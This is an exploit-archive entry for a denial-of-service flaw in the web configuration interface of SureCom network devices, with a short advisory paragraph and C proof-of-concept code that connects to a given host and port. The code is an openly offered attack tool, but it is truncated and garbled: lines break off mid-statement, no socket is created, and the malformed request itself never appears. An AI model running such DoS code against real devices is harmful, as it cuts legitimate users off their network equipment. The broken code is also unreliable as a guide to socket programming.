SureCom network device malformed web request DoS vulnerabilit

Code

                                                source: http://www.securityfocus.com/bid/9795/info

An issue in the handling of specific web requests by SureCom network devices has been identified. By placing a malformed request to the web configuration interface, it is possible for an attacker to deny service to legitimate users of a vulnerable device.

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
        if(argc < 3) {
                printf("SureCom Network Device
DoS,\n");
                printf("by shaun2k2 -
[email protected]\n\n");
                printf("Usage: %s <host> <port>\n",
argv[0]);
                exit(-1);
        }

        int sock;
        struct hostent *he;
        struct sockaddr_in dest;

        if((he = gethostbyname(argv[1])) == NULL) {
                herror("gethostbyname()");
                exit(-1);
        }

        dest.sin_family = AF_INET;
        dest.sin_port = htons(atoi(argv[2]));
        dest.sin_addr = *((struct in_addr

        printf("[+] Connecting...\n");
        if(connect(sock, (struct sockaddr *)&dest,
